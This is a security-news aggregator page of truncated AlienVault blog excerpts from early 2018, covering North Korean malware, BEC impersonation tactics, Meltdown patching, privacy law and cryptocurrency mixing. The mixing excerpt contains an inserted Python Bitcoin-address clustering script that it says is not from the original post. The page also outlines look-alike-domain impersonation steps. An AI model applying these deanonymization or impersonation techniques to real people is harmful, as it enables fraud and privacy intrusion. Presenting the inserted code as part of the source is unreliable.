Chinese police are wearing sunglasses that can recognize faces. No, that’s not the plot of a movie, but what’s actually happening. Railway police in Zhengzhou, a central Chinese city, are the first in the country to use facial-recognition eyewear to screen passengers during the Lunar New Year travel rush. The devices have allegedly already helped nab seven fugitives related to major criminal cases such as human trafficking and hit-and-runs, and 26 others who were traveling with fake identities.

While that may be well and good, there are some issues with facial recognition. Joy Buolamwini, a researcher at the MIT Media Lab, has shown how real-life biases can creep into A.I. The result is that for a white man, facial

[2018-02-16T14:00:00+00:00] http://feeds.feedblitz.com/~/526798026/0/alienvault-blogs~Things-I-Hearted-this-Week-th-Feb | www.secnews.physaphae.fr/article.php?IdArticle=481022

North Korean Cyber-Attacks and Collateral Damage

$150,000 - but the total damage caused by WannaCry has been estimated in the billions of dollars. There is strong evidence linking WannaCry to a group of hackers known as ‘Lazarus’, reportedly operating out of the DPRK (North Korea). Whilst WannaCry is perhaps the most famous attack by Lazarus, it isn’t the only ‘collateral damage’ caused by the DPRK’s cyber actions. Below we disclose new details on three attacks that have spread out of control: two likely originating from the DPRK, and one targeting the DPRK.

The Voice of Korea and the Rivts Virus

This section describes a piece of malware that may have been created within the DPRK as part of a test project, and accidentally leaked out onto the wider internet.
A simple file-infector

We triage many millions of malicious files automatically every day in an effort to ensure our customers are covered from new threats. One malware family we regularly see, called Rivts by antivirus vendors, was originally created in 2009 but still continues to spread. Rivts is a file-infecting worm: it spreads across USB drives and hard drives, attaching itself to files to spread further. The new files we see every day are the result of new files being infected with the original worm from 2009, not new developments by the attacker. Overall, it’s a fairly boring file infector (or “virus”). But there was one very strange thing that caught our eye.

North Korean Software

As part of its initial infection process, Rivts checks for the presence of system files normally found on Windows XP to infect first. But it seems to expect two pieces of uncommon software in the Windows System folder. Below are the details of these two files, nnr60.exe and hana80.exe:

Whilst the DPRK is well known for developing its own Linux-based operating system, and there is evidence of some DPRK hackers using

[2018-02-15T14:00:00+00:00] http://feeds.feedblitz.com/~/526529066/0/alienvault-blogs~North-Korean-CyberAttacks-and-Collateral-Damage | www.secnews.physaphae.fr/article.php?IdArticle=481023

Tips To Avoid LOVE-INT On Valentine's Day

Strategy

When deciding how best to avoid OSINT that can be used to harass you in the future, it can help to break up the recorded details of your life into two broad categories: things you can hide or change, and things you can’t, or that are difficult to hide or change. For the sake of this post, we will only be dealing with things that we have easy online or physical control over. As always, it’s best to consult your threat models and apply reasonable measures to avoid whatever threats your particular ex may pose to you.
Scrubbing public profiles is the first, easiest way to ensure that you aren’t sabotaging your own effort to avoid contact. Some simple steps you can take to increase your OPSEC include:

Change all of your account passwords ASAP — If your instincts label someone as dangerous enough to alter publicly available information about yourself, it’s likely that their behavior follows a pattern that existed while you were together with them. Close and personal contact with someone often means that you make exceptions to your threat models that allow them into close personal contact with both you and your devices. Never underestimate the lengths an untrustworthy ex-boyfriend or girlfriend will go to in order to snoop on you, so it’s best at minimum to ensure your passwords are in a controlled state. While you’re doing this, be sure to sign out of all other points of access for any given service.

Revoke private keys and generate new key pairs — Physical access to electronic assets lends itself to theft of sensitive information that you may be holding to protect your communications, such as PGP keys. If you suspect that your keys may have been compromised, it never hurts to revoke and regenerate keys just to be safe. On the subject of keys, re-keying your door locks and changing garage door codes can be a good way of re-establishing your physical security, and reclaiming confidence that your environment is untouched while you’re gone.

Secure crypto-coin wallets — Along with PGP keys, coin wallets are another store of electronic information meant to be kept private, one that can easily be compromised by someone who knows what they want, knows where to find it, and has implicit access to the location where it is kept. With ever-increasing links between electronic and financial security, if one is compromised the other may be as well.
Consider fresh installs of your operating systems and factory resets of your phone — This may seem a little extreme, but it is an especially good idea if your devices were ever left alone with your formerly-beloved for any amount of time long enough to exploit. A backdoored phone or notebook would be a prime, continuing source of LOVE-INT, and in this post-FlexiSpy world, where commodity spyware is more accessible than ever to

[2018-02-14T14:00:00+00:00] http://feeds.feedblitz.com/~/526211154/0/alienvault-blogs~Tips-To-Avoid-LOVEINT-On-Valentines-Day | www.secnews.physaphae.fr/article.php?IdArticle=481024

Global Cybersecurity Concerns in 2018

People around the world are becoming increasingly connected with smart devices. Sending and receiving massive amounts of data back and forth, we rely on the transfer and storage of data on a daily basis. Hackers and cyber attackers know this and know how to steal data for their profit. Your job as an information security specialist is to defend your company’s data, implementing preventative and protective measures and monitoring your data and systems.

With the increasing amount of data businesses and their customers are producing comes an increasing number of people maliciously trying to obtain it. In 2017, we saw increases in ransomware attacks, financial fraud and massive data breaches. It was a busy year for security practitioners, and 2018 will be no different, with new global regulations, redesigned threats to new devices, and new ways to combat those threats. Let’s take a look at some cybersecurity issues every InfoSec specialist should be aware of in the coming months of 2018.

Upcoming Requirements of the GDPR

The General Data Protection Regulation is the European Union’s way of protecting its citizens’ data by holding organizations and companies accountable for how their security personnel handle sensitive information.
As of May 25, 2018, companies will risk severe fines if they are not in compliance with the GDPR data protection rules. In an effort to minimize the damage done during recent data breaches, rules will be implemented on how you and your company obtain and secure data, as well as on notifying users of a breach immediately. Under the GDPR, companies will rely on their IT security specialists to:

Obtain explicit consent when collecting customer data.
Be clear and upfront with customers about how they’ll obtain this data, in language that is accessible and easy to understand.
Comply with data protection officers who will inventory data in the EU, including outside company data that pertains to goods and services held within the EU.
In the event of a breach, notify the public within 72 hours or be penalized.

The EU isn’t the only geography implementing privacy measures for its citizens. Australia implemented privacy regulations recently as well.

The Liabilities of IoT

In a day and age where humans are increasingly integrating the internet into their day-to-day lives, we have no choice but to submerge ourselves in the internet of things (IoT). This includes the business world as well. Mobile devices have become a necessity, and a network of connected smartphones, tablets and other smart devices has made it considerably easier for businesses to access information from the internet and communicate. It has also made it considerably easier for hackers to get their hands on the same information — which is, in turn, making it harder and harder on the InfoSec practitioner. For usability purposes, nearly everything can be connected to Wi-Fi.
A company’s smart coffee pot can be connected to an iPhone for a convenient cu

[2018-02-12T14:00:00+00:00] http://feeds.feedblitz.com/~/525524671/0/alienvault-blogs~Global-Cybersecurity-Concerns-in | www.secnews.physaphae.fr/article.php?IdArticle=481025

Things I Hearted this Week 9th Feb 2018

By far one of the most engaging pieces I’ve read in a while is this Gizmodo article by Kashmir Hill and Surya Mattu on what happened when they decided to connect a whole bunch of “smart” devices in Hill’s apartment, and monitored what data was being collected and sent by these devices.

The house that spied on me | Gizmodo

Related
Your TV is probably tracking you -- here's how to stop it | Cnet
Boffins crack smartphone location tracking – even if you've turned off the GPS | The Register
Amazon Says Don't Worry About This Raspberry Pi Key Hack -- But Is Fixing It Anyway | Forbes

Ethereum Scammers make $5,000 in a night

“Online scammers have made over $5,000 worth of Ethereum in one night alone, showing how gullible some cryptocurrency users can be. Miscreants achieved this by creating fake Twitter profiles for real-world celebrities and spamming the social network with messages tricking users to participate in "giveaways." Crooks deceived users into sending a small amount of Ethereum, promising they would receive the sum ten times over as part of the giveaway. All the messages followed the same pattern, even if the sums and Ethereum wallet addresses varied between the fake Twitter accounts.”

Ethereum Scammers Make $5,000 in a Night by Impersonating Celebs on Twitter | Bleeping Computer

Hunting Insecure Direct Object Reference

Bug bounty reports where the researchers recount their steps are probably some of my favourite types of posts, as I always end up learning something new. And this one by Mohammed Abdul Raheem is no different.
Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (part 1) | Codeburst.io
Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART 2) | Codeburst.io

Privacy down under

While all eyes have been on GDPR, the Ozzies don’t want to be left behind as the Office of the Australian

[2018-02-09T14:00:00+00:00] http://feeds.feedblitz.com/~/524596928/0/alienvault-blogs~Things-I-Hearted-this-Week-th-Feb | www.secnews.physaphae.fr/article.php?IdArticle=467404

How Dangerous are Impersonation Attacks?

The U.S. Federal Bureau of Investigation (FBI) has warned businesses about this growing threat and has estimated that such attacks have caused losses of approximately $5.3 billion globally. A common example of impersonation attacks is Business Email Compromise (BEC), or "CEO fraud", which continues to manipulate companies by using false identities. This can severely damage a company’s reputation. This blog from last year explains BEC in detail.

Why are Impersonation Attacks Hard to Detect?

The major reason these attacks are difficult for users to detect is ignorance and lack of attention to detail. Let’s understand this through an example. Below is the same email address written twice; how fast can you spot the one with an error?

eeryaeel@reveantivirus.com
eeryaeel@reventivirus.com

It is hard to figure out the irregularity, especially when you have a hectic schedule at work and many distractions.

How are Impersonation Attacks Constructed?

Finding the Target

With the help of social engineering techniques, attackers look for potential victims. Facebook, LinkedIn and Twitter profiles are the easiest mediums for attackers to collect information about their target. Name, email address, school, job title, short bio, job duties, location, etc. can easily be fetched by attackers from the target’s social media accounts.
Social engineering, which requires very little technical skill, can typically get attackers an unbelievable amount of information about the victim, freely available online.

Creating Credibility

Now, as the attacker has a significant amount of the target’s information in hand, the next step is to build credibility. Again, social engineering is an effective way to set the stage for the attack. The attacker will try to figure out who to impersonate. It could be the victim’s boss, one of his colleagues or someone close to him. Close friends can be found on Facebook, and people tend to be very trusting if they think they are dealing with close friends. Through the company website and social media pages, the attacker can easily pick the person to impersonate.

Executing the Attack

The final and most important step is to choose a type of attack. Below are the top three tactics used by attackers:

By Registering a Look-Alike Email Domain

The attacker can register a similar email domain and create a new email ID using a similar name to the person being impersonated. The attacker sends an email message to the target asking them to respond urgently. For instance, impersonating the target’s boss, the attacker creates an email ID Smith@reventivirus.com and asks the victim to make an urgent payment for an invoice attached to the message.

Editing the Display Name

The majority of mobile email clients only show the display n

[2018-02-08T14:00:00+00:00] http://feeds.feedblitz.com/~/524171922/0/alienvault-blogs~How-Dangerous-are-Impersonation-Attacks | www.secnews.physaphae.fr/article.php?IdArticle=466646

How to Handle Meltdown and Spectre: Patch, But Don't Rush It

Google Project Zero post. If you are looking for something a little higher level, that includes more actionable pointers, I’d recommend this clear guide to Meltdown and Spectre patches.
As for this post, I’m not going to provide another analysis of Meltdown and Spectre, and I’m also not going to pass judgement. I’m mainly concerned with what organizations are doing to defend themselves. Despite all the press and publicity (a Google query for “meltdown and spectre” yielded nearly three million entries after only 14 days), there has been little in the way of solid recommendations to blunt the impact of the problem. Microsoft has provided patches to block access to vulnerable operations, but these are offered with warnings about side effects and potentially disruptive software interactions. Similarly, Intel has released, then issued warnings on, firmware updates that were intended to help. There is an overarching sense of confusion about the right next steps, especially around the right timing to adopt these remediations.

Seeing this, we kicked off a quick survey to find out how people were coping, and whether this critical and noisy problem was spurring rapid response, or whether those measures were being impacted by some of these negative reports. If you haven’t yet decided exactly what to do, you are not alone. Across the set of respondents, 95% of whom are directly responsible for security updates, only 21% had applied the Microsoft patch to more than 75% of their systems. Most of them, 51%, had patched less than a quarter of their systems, and 61% acknowledged that they were aware that these patches could cause adverse interactions with other products.

This does not need to be the fire drill it may currently feel like

The best advice for dealing with this situation is to recognize that the changes that major firms like Microsoft, Oracle, Apple, and others had to make are serious modifications to low-level system behaviors — changes that may impact their own performance, or that of other applications.
These second-order consequences can be nearly as damaging as any eventual attack that exploits these flaws, particularly if widespread updates cause intermittent or widespread downtime. This event provides security leaders with the opportunity to show balance. A knee-jerk reaction is to instantly apply the patches when available, cleaning up the fall-out as it happens. But why? Currently

[2018-02-07T14:00:00+00:00] http://feeds.feedblitz.com/~/523777946/0/alienvault-blogs~How-to-Handle-Meltdown-and-Spectre-Patch-But-Don%e2%80%99t-Rush-It | www.secnews.physaphae.fr/article.php?IdArticle=465965

Debunking these 3 Domain Name Registration Myths Once and For All

Exact match domains (EMDs) used to be a thing (or still are, depending on who you talk to). You stuffed a few keywords into the domain before checkout to give yourself that extra edge to rank for cut-throat queries like “bestvitaminshop.com.” Domain age has also been rumored to influence rankings. Somehow, the older the domain and the longer you register it for tells Google… to like you more? Admittedly, the logic is flimsy. But Google originally debunked these myths in 2009, according to some digging by Matt McGee at Search Engine Land. First, there was a Google Webmaster Help forum thread where Googler John Mueller addressed this question head-on:

“A bunch of TLDs do not publish expiration dates — how could we compare domains with expiration dates to domains without that information? It seems that would be pretty hard, and likely not worth the trouble. Even when we do have that data, what would it tell us when comparing sites that are otherwise equivalent?
A year (the minimum duration, as far as I know) is pretty long in internet-time :-).”

Next up, they had former Google PR chief Matt Cutts on the record several times addressing this issue:

“To the best of my knowledge, no search engine has ever confirmed that they use length-of-registration as a factor in scoring. If a company is asserting that as a fact, that would be troubling.”

So there you have it. “Officially,” domain registrations don’t affect SEO. At least, not directly. Recently, there’s been some evidence that search engine result page (SERP) click-through rate (CTR) affects rankings. One experiment had a sizable group of people click on a random listing in the seventh position to see what (if any) changes occurred. And within just a few hours? Straight to the top.

The finding shows an odd correlation between SERP performance and its influence on ranks. The point being that it is possible that a better domain name, one that’s more credible and interesting for people to click, could indirectly influence rankings. The industry-standard .com domain is still seen as the most credible, even though new top-level domains (TLDs) continue to pop up and gain acceptance. Studies have backed this up, showing that .com domains generally dr

[2018-02-06T14:00:00+00:00] http://feeds.feedblitz.com/~/523389918/0/alienvault-blogs~Debunking-these-Domain-Name-Registration-Myths-Once-and-For-All | www.secnews.physaphae.fr/article.php?IdArticle=465029

Australian Privacy Act Gets New Notification Requirements

With GDPR the focus of many press headlines across the world, you’d think it was the first and only regulation covering the privacy of individuals!
However, privacy regulations exist in numerous countries around the globe, and anyone in Australia or its territories will be all too familiar with the Australian Privacy Act 1988 (which, for simplicity, I'll just refer to as 'the Privacy Act' from this point forward). Administered by the Office of the Australian Information Commissioner (OAIC), the Privacy Act sets out 13 privacy principles (the Australian Privacy Principles, or APPs) that govern how the personal information of Australian subjects must be handled. Failure to protect personal information is deemed “...an interference with the privacy of an individual,” with financial penalties of up to AUD$360,000 for individuals and up to AUD$1.8M for organizations. What’s top of mind for many who are subject to the Privacy Act is a new amendment: the Privacy Amendment (Notifiable Data Breaches) Act 2017. Prompted by the proliferation of personal information stored in electronic form, such as social media content, healthcare records, and more, the amendment acknowledges the increasing risk (and frequency) of breaches of that data. Starting 22 February 2018, the amendment introduces the Notifiable Data Breaches (NDB) scheme. This requires organizations to notify affected individuals, and the OAIC, of an ‘eligible data breach,’ which is defined as a breach in which BOTH of the following conditions are met:
1. An individual’s personal information has been subject to unauthorized access, disclosure, or loss; and
2. The breach is likely to result in serious harm to that individual.
A breach that meets the first condition but is unlikely to cause serious harm (for instance, because the data was strongly encrypted and the key was not exposed) is not an eligible breach, so the serious-harm assessment is where most of the work, and the evidence you will need to defend your decision, lives.
Who Needs To Comply with the Australian Privacy Act?
The Privacy Act applies to all Australian government agencies, and to businesses and non-profit organizations with an annual turnover of more than AUD$3 million. In addition, small businesses and organizations with an annual turnover of less than AUD$3 million that fall into the following categories must also comply with the Privacy Act: private sector health service providers, including traditional healthcare providers (hospitals, day surgeries, medical practitioners, pharmacists, health professionals) and complementary thera
(Published 2018-02-05T14:00:00+00:00; http://feeds.feedblitz.com/~/523044702/0/alienvault-blogs~Australian-Privacy-Act-Gets-New-Notification-Requirements; www.secnews.physaphae.fr/article.php?IdArticle=464442)

AlienVault Blog: Things I Hearted this Week, 2nd Feb 2018

browsers’ built-in login managers to retrieve and exfiltrate IDs. The most commonly asked question on the back of that was “which password manager should I use?” Luckily, my friend Adrian Sanabria has done the legwork for you and compiled a list of password managers across different browsers and whether they leak credentials or not.
Password Manager Vulnerability Silently Giving Up Credentials | Threatcare
The follower factory
A very well researched and presented piece by the NYTimes on the business of buying fake followers, what it means to those that buy them, the companies that broker fake identities, and the impact on social media platforms.
The follower factory | NYTimes
Somewhat related:
Here’s why the epidemic of malicious ads grew so much worse last year | ars technica
Who will pay for Spectre? Probably you
What do Toblerone and Brexit have in common with Spectre? A whole lot more than you may think.
Who will pay for Spectre? Probably you | Owen Rogers, Medium
GDPR
Even my spellcheck knows not to question me whenever I type GDPR these days. But that’s not to say it isn’t a topic which generates good discussion.
Two pieces that recently caught my eye were:
Things to consider before publishing an article about GDPR | Rowenna Fielding / LinkedIn
Data Protection, Security, and the GDPR: A fuzzy and fraught relationship | Infospectives
The great crypto-currency rush
Whether you believe that cryptocurrencies are a bubble or the next big thing in online payments, there is no denying that they are a hot commodity at the moment. So much so that criminals are putting a lot of effort into trying to illegally gain a slice of the crypto-pie. The attacks come from a variety of angles. A criminal was able to steal about $150,000 by tricking Experty users into sending their
(Published 2018-02-02T14:00:00+00:00; http://feeds.feedblitz.com/~/522220812/0/alienvault-blogs~Things-I-Hearted-this-Week-nd-Feb; www.secnews.physaphae.fr/article.php?IdArticle=464011)

AlienVault Blog: Mitigating Blockchain Analysis: Mixing Cryptocurrency

Cryptocurrency and Blockchain Analysis
Cryptocurrency is a digital currency, and it comes in many forms, built upon varying blockchain technologies. Bitcoin is the original cryptocurrency, created in 2009 by the pseudonymous cypherpunk Satoshi Nakamoto. Since then, many alternative cryptocurrencies have been created; popular alternatives are Litecoin, Ethereum, and Monero. Samuel Falkon had it right when he said that “cryptocurrencies are a dream for privacy and freedom lovers because they restore transacting power back to whom it belongs — individuals who have a right to control their own money.” While cryptocurrency is a great advance for the cypherpunk dream of privacy, it still comes with its own set of flaws that allow for deanonymization through blockchain analysis and off-chain analysis. Bitcoin is often thought to be an anonymous solution for digital transactions, but this simply is not true. Every time a transaction is made, the technical details of that transaction (its input and output addresses and amounts) become a public record on the blockchain. The blockchain is a public ledger that holds a history of all transactions ever made, which leaves every one of them open to analysis. Blockchain analysis services include:
https://www.walletexplorer.com
https://chainalysis.com
https://scorechain.com
https://blockseer.com
https://coinalytics.co
https://sabr.io
https://elliptic.co
http://numisight.com
and many more.
More recently, The Bitfury Group released a whitepaper for their new blockchain analysis algorithm with the goal of identifying the users behind digital transactions, dubbing their deanonymization solution a “Bitcoin clustering” algorithm. Bitcoin address clustering is self-described as “a process that exposes bitcoin users by determining which addresses belong to a single user through an analysis of Blockchain data. The act of clustering groups those addresses together, enabling investigators to link them to a single entity.” (The Bitfury Group Unveils Solution For Analyzing Related Bitcoin Addresses, The Bitfury Group) The Bitfury Group’s analysis research should not be shocking to us. They perform blockchain analysis, just as we should expect adversaries to do. The innovative part of this algorithm is that they also analyze publicly available information on the web, or as they call it “off-chain tag collection,” to aid their clustering algorithm. There are two tag collection approaches that The Bitfury Group takes: passive and active.
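To make the on-chain half of this concrete before the off-chain tags are discussed, here is a small worked example of address clustering. It is added here and is not code from the original post or from The Bitfury Group's whitepaper; it implements the classic common-input-ownership heuristic (every input of a transaction is assumed to be spent by one entity), merges addresses with a union-find structure, and then attaches off-chain tags to whole clusters, which is the effect the passage describes. The transactions, addresses and tags are constructed for the example. The caveat a practitioner should keep in mind is the one this article's title points at: a CoinJoin or mixing transaction deliberately combines inputs from unrelated owners, so feeding such transactions to this heuristic produces false merges, and real tooling filters them out first.

```python
"""Bitcoin address clustering by the common-input-ownership heuristic.

Added example, not taken from the original post or from Bitfury's
whitepaper. Inputs of one transaction are assumed to share an owner and
are merged with union-find; outputs are registered but never merged,
because receiving a payment is not evidence of shared control.
"""
from collections import defaultdict

# Constructed sample transactions (not real blockchain data):
# each entry is (input_addresses, output_addresses).
SAMPLE_TXS = [
    (["A1", "A2"], ["B1", "A3"]),   # A1 and A2 co-spent -> same owner
    (["A2", "A4"], ["C1"]),         # A2 co-spent with A4 -> A4 joins A1's cluster
    (["B1"], ["D1", "B2"]),         # single-input spend: nothing to merge
    (["E1", "E2"], ["A1"]),         # E1/E2 share an owner; paying A1 does not link them to A1
]

# Constructed off-chain tags, e.g. an address pasted in a forum signature
# or published on an exchange's deposit page.
SAMPLE_TAGS = {"A4": "forum-user-x", "E1": "exchange-y"}


class UnionFind:
    """Disjoint-set forest with path halving; keys are created on demand."""

    def __init__(self):
        self.parent = {}

    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]  # path halving
            x = self.parent[x]
        return x

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def cluster_addresses(txs):
    """Return {representative: sorted member addresses} for the given txs.

    Caller is expected to have dropped CoinJoin-style transactions, since
    they violate the one-owner-per-input assumption this relies on.
    """
    uf = UnionFind()
    for inputs, outputs in txs:
        for addr in inputs + outputs:
            uf.find(addr)               # register every address seen
        for addr in inputs[1:]:
            uf.union(inputs[0], addr)   # all inputs -> one owner
    clusters = defaultdict(list)
    for addr in list(uf.parent):
        clusters[uf.find(addr)].append(addr)
    return {rep: sorted(members) for rep, members in clusters.items()}


def cluster_of(clusters, addr):
    """Return the sorted cluster containing addr, or None if unknown."""
    for members in clusters.values():
        if addr in members:
            return members
    return None


def label_clusters(clusters, tags):
    """Propagate each off-chain tag to the whole cluster of the tagged address."""
    labels = defaultdict(set)
    for rep, members in clusters.items():
        for addr in members:
            if addr in tags:
                labels[rep].add(tags[addr])
    return {rep: sorted(names) for rep, names in labels.items()}


def entity_for(clusters, labels, addr):
    """Return the sorted labels linked to addr through its cluster ([] if none)."""
    for rep, members in clusters.items():
        if addr in members:
            return labels.get(rep, [])
    return []


if __name__ == "__main__":
    clusters = cluster_addresses(SAMPLE_TXS)
    labels = label_clusters(clusters, SAMPLE_TAGS)
    for rep, members in clusters.items():
        print(rep, members, labels.get(rep, []))
```

Running it shows A1, A2 and A4 collapsing into one entity tagged "forum-user-x" even though only A4 was ever tagged, while A3 (an output of the first transaction) stays separate: the heuristic says nothing about change outputs, which is why analysis firms layer further heuristics and off-chain data on top of it.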
Off-chain tag collection for clustering, passive tag collection: the passive approach includes crawling the web for publicly available information, typically on
(Published 2018-02-01T14:00:00+00:00; http://feeds.feedblitz.com/~/521946804/0/alienvault-blogs~Mitigating-Blockchain-Analysis-Mixing-Cryptocurrency; www.secnews.physaphae.fr/article.php?IdArticle=463357)

AlienVault Blog: Threat Detection in a Changing Market: A Conversation with AlienVault MSSP Partner Sword & Shield

Jason Graf, director of managed security services for Sword & Shield Enterprise Security, a top Managed Security Services Provider (MSSP) based in Knoxville, Tennessee. We talked about the evolving threat landscape and the challenges associated with detecting and analyzing ransomware and other emerging threats on a daily basis. Graf started the discussion by providing context around Sword & Shield’s business, which has been protecting critical data for mid-to-large-sized companies for more than 20 years. The company started focusing on managed security services five years ago, as attacks became more sophisticated and burdensome for companies. The MSSP’s core business is to provide 24/7 detection and response capabilities against cyber threats for its customers. “Sword & Shield combines expert analysts, proprietary processes, and advanced technology to protect our clients around the clock, 365 days a year. We take this responsibility seriously, so we only use technology that is up to the task.” Graf went on to explain that Sword & Shield’s managed security services also help companies achieve industry compliance. “Compliance is a key driver of our services, particularly for companies in the healthcare and retail industries that need to satisfy regulatory and industry requirements.” Graf said the Sword & Shield team of security analysts monitors from 1,000 to 20,000 assets per customer environment, every day. That’s a lot of assets! Not only are there more assets than ever to monitor today, but security threats are also getting more complex and harder to detect. Sword & Shield relies on AlienVault® Unified Security Management® (USM™) to detect and analyze their customers’ threats. USM includes built-in security controls and continuous threat intelligence updates from AlienVault Labs to simplify threat detection and incident response. A unified approach to security monitoring eliminates the need for Sword & Shield to manage multiple solutions, saving them time and money. Sword & Shield also leverages threat intelligence from AlienVault’s Open Threat Exchange® (OTX™), which tracks emerging threats from all over the world. By leveraging USM and OTX, Sword & Shield can focus on delivering value to their customers through threat detection and SOC data analysis, and so grow their managed security services more rapidly. Graf likes the comprehensiveness of USM compared to other security solutions. He explained that it goes well beyond the traditional capabilities of SIEM and log management. “While other providers offer point solutions, AlienVault’s USM provides a holistic, unified solution with essential capabilities including intrusion detection and vulnerability management.” For Sword & Shield, pinpointing command-and-control communications before they are used for further malicious activity is important. The MSSP can consolidate their alarms, vulnerabilities and configuration issues into a single view through USM Central, our threat management console available with the USM platform. A consolidated view of the threats detected in their end-customer environments enables Sword & Shield to work more efficiently and respond more quickly to any security incidents detected.
(Published 2018-01-31T14:00:00+00:00; http://feeds.feedblitz.com/~/521596094/0/alienvault-blogs~Threat-Detection-in-a-Changing-Market-A-Conversation-with-AlienVault-MSSP-Partner-Sword-amp-Shield; www.secnews.physaphae.fr/article.php?IdArticle=462740)

AlienVault Blog: OTX Trends Part 3 - Threat Actors

Part 1 focused on exploits and Part 2 addressed malware. This part will discuss threat actors and patterns we have detected with OTX.
Which threat actors should I be most concerned about?
Which threat actors your organization should be most concerned about will vary greatly. A flower shop will have a very different threat profile from a defense contractor. Therefore, below we’ve limited ourselves to some very high-level trends for particular threat actors, many of which may not be relevant to your organisation.
Which threat actors are most active?
The following graph describes the number of vendor reports for each threat actor over the past two years, by quarter. For clarity, we have limited the graph to the five threat actors reported on most in OTX. This is useful as a very rough indication of which actors are particularly busy.
Caveats
There are a number of caveats to consider here. One newsworthy event against a single target may be reported in multiple vendor reports, whereas a campaign against thousands of targets may be represented by only one report. Vendors are also more inclined to report on something that is “commercially interesting”; for example, activity targeting banks in the United States is more likely to be reported than attacks targeting the Uyghur population in China. It’s also likely we missed some reports, particularly in the earlier days of OTX, which may explain some of the increase in reports between 2016 and 2017.
The global targeted threat landscape
There are a number of suggested methods to classify the capability of different threat actors. Each has its problems, however. For example, if a threat actor never deploys 0-day exploits, do they lack the resources to develop them, or are they mature enough to avoid wasting resources unnecessarily? Below we have plotted a graph of the threat actors most reported on in the last two years. We have excluded threat actors whose motivation is thought to be criminal, as that wouldn’t be an apples-to-apples comparison. Both the measure of their activity (the number of vendor reports) and the measure of their capability (a rough rule of thumb) are unscientific, but can provide some rough insights:
(Chart: A rough chart of the activity and capability of notable threat actors in the last year)
Perhaps most notable is which threat actors are not listed. Some, such as APT1 and Equation Group, seem to have disappeared in their existing form following very public reporting. It seems unlikely that groups which likely employ thousands of people have disappeared completely; the lack of reporting is more likely the result of significantly changed tactics following their outing, which makes their new activity harder to identify. Others remain visibly active, but not enough to make our chart of “worst offenders”.
A review of the most reported-on threat actors
The threat actor referenced i
(Published 2018-01-30T13:40:00+00:00; http://feeds.feedblitz.com/~/521337082/0/alienvault-blogs~OTX-Trends-Part-Threat-Actors; www.secnews.physaphae.fr/article.php?IdArticle=461917; tags: APT 38, APT 10, APT 28, APT 3, APT 1, APT 34)

AlienVault Blog: Hackers Using AI? An Increase in the FUD Factor

It’s hard to envision hackers, whether skiddies, APTs, or anything in between, using any sort of artificial intelligence (AI) or machine learning (ML) to attack a target network. Despite the availability of these sophisticated technologies, the most simplistic attack tactics continue to work.
Enterprises aren’t patching known vulnerabilities; freely available malware can run in memory undetected; users continue to click on links they receive in email or enable macros on that innocent-looking Office document; and internal network logs are often not collected, and even more rarely kept for any length of time. If these methods work, why would adversaries turn to more complex solutions like AI or ML? Looking back on 2017, perhaps the biggest takeaway is that the most obvious methods still work. Adversaries seek the greatest mission gain with the lowest amount of resources expended and equities exposed. For example, Equifax wasn’t pwned by a fancy zero-day exploit or an insider with a USB drive (it was a publicly known, unpatched Apache Struts vulnerability); PII on millions of consumers wasn’t culled from S3 buckets because Amazon’s infrastructure was hacked by an APT (the buckets had simply been left publicly readable); WannaCry wasn’t the result of a zero-day vulnerability (the patch had been available for two months); and people (amazingly) clicked Yes to download an update to Adobe Flash, giving us BadRabbit! Sticking with what works continues to pay off for all adversaries, irrespective of their resources, motives or intent. So, what’s with the fear mongering over hackers using AI and ML to attack their targets? AI (by which I mean both machine learning and AI in general) is the gift that keeps on giving. Most in the InfoSec community agree that AI has its place in the defense of the enterprise. The problem is that few people understand how AI works or how best to apply it, and many cybersecurity companies take advantage of this situation by making fancy-sounding claims about the number of models they apply to the data or the types of mathematics they use to generate results. These claims generally go hand in hand with a dark-themed user interface with some sort of spinning globe or pew-pew map.
And while defenders work to sift through the marketing blather and outrageous claims about cybersecurity products that use AI, some in the security world take further advantage and extend the FUD: what could be better to sow fear and confusion than claiming that hackers are now using AI to attack your network? The more observant in the InfoSec community have noticed that this language tends to originate with companies that stand to profit from the very same FUD that permeates the market. This FUD spreading takes a few different forms, often by way of polls, as in: how many people believe hackers will use AI? There have been a few of these polls where more than 50 percent of respondents agree that this is a real threat. For the life of me, I can’t understand why. The other way is through companies that make the claim directly. This comes in the form of sponsored posts on various InfoSec news sites, or interviews with company executives. There have been claims made about adversaries detected and intrusions executed using AI; while this may come to pass in the future, it’s incredibly unlikely any time soon. There are simply too many ways for adversaries to attack networks and accomplish their objectives using far simpler and less risky tactics. An adversary who has mastered the use of AI in their operations would only use it for the hardest of the hard targets, and even then, they’re likely to find an easier way to achieve their objective. Yet it’s important to note that the academic and security-minded research into hackers’ use of AI is real, and important. Adversarial machine learning is one angle.
This work is important; it helps understand the cap
(Published 2018-01-29T14:00:00+00:00; http://feeds.feedblitz.com/~/521089464/0/alienvault-blogs~Hackers-Using-AI-An-Increase-in-the-FUD-Factor; www.secnews.physaphae.fr/article.php?IdArticle=461314; tags: Wannacry, Equifax)

AlienVault Blog: NY State Department of Financial Services New Cybersecurity Regulation – CISO Attestation Due Feb 15

The first New York State (NYS) Department of Financial Services (DFS) CISO attestation is due on February 15th. Last year, the NYS DFS enacted a new cybersecurity regulation that affects all financial companies that conduct business in the State of New York. A "Covered Entity" means any Person operating under or required to operate under a license, registration, charter, certificate, permit, accreditation or similar authorization under the Banking Law, the Insurance Law or the Financial Services Law of the State. A company need not be domiciled in the State to be subject to the regulation (very similar to how GDPR is set up). Financial institutions include banks, money managers, and insurance companies. There are exceptions, but they are quite limited (based on institutional income and employee count). The impact of this regulation is very broad. In previous articles, I discussed the evolution of the regulation, as well as some of the important milestones that must be achieved in order to achieve compliance with it. The first milestone date passed back in August, and now the next important milestone is looming: the designated CISO of each financial organization must file the first certification of the organization’s compliance with the regulation. The regulation includes the letter that must be filled out and filed with the Department of Financial Services. It is a simple, somewhat inelegant form, but it packs a powerful legal punch in that the CISO is attesting that the regulation is being followed. This means that your organization must have implemented the six items required in the first milestone. The reason this simple form is so powerful is the undefined enforcement powers of the regulation. The exact language states: “This regulation will be enforced by the superintendent pursuant to, and is not intended to limit, the superintendent’s authority under any applicable laws”. To a tech person, those sound like some very broad enforcement powers. One has to wonder whether enforcement will be limited to preventing a non-compliant business from conducting operations in New York, or whether it can be as harsh as the penalties 